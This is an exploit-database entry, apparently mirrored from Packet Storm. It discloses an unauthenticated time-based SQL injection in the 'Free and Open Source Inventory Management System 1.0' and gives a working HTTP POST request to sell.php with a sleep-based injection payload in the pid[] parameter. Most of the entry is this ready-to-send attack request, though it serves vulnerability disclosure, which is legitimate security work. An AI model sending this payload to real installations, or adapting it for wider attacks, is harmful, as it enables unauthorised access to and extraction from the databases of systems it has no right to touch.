Share
## https://sploitus.com/exploit?id=PACKETSTORM:174705
# Exploit Title: Free and Open Source Inventory Management System 1.0 - Unauthenticated SQL Injection  
# Exploit Author: Sefa Ozan  
# Date: 16/09/2023  
# Vendor: MAYURIK  
# Vendor Homepage: https://mayurik.com/  
# Software Link: https://www.sourcecodester.com/php/16741/free-and-open-source-inventory-management-system-php-source-code.html  
# Tested on: Windows 10 Pro & Ubuntu 22.04  
  
  
## Description:  
The `pid[]` parameter is vulnerable to Time Based SQL injection attacks. To prove the existence of the vulnerability, the database was put to sleep for 10 seconds.  
  
  
## Request:   
POST /ample/app/action/sell.php HTTP/1.1  
Host: localhost  
User-Agent: python-requests/2.31.0  
Accept-Encoding: gzip, deflate, br  
Accept: */*  
Connection: close  
Content-Length: 297  
Content-Type: application/x-www-form-urlencoded  
  
customer_name=1&orderdate=16/12/2023&pid[]=1+AND+(SELECT+IF+(1=1,sleep(10),'A'))='A'+OR+'SEFA'=:value&total_quantity[]=12&price[]=4500&orderQuantity[]=1&totalPrice[]=4500&pro_name[]=&subtotal=4500&s_discount_amount=0&discount=&prev_due=12&netTotal=4500&paidBill=123&dueBill=4377&payMethode=PhonePe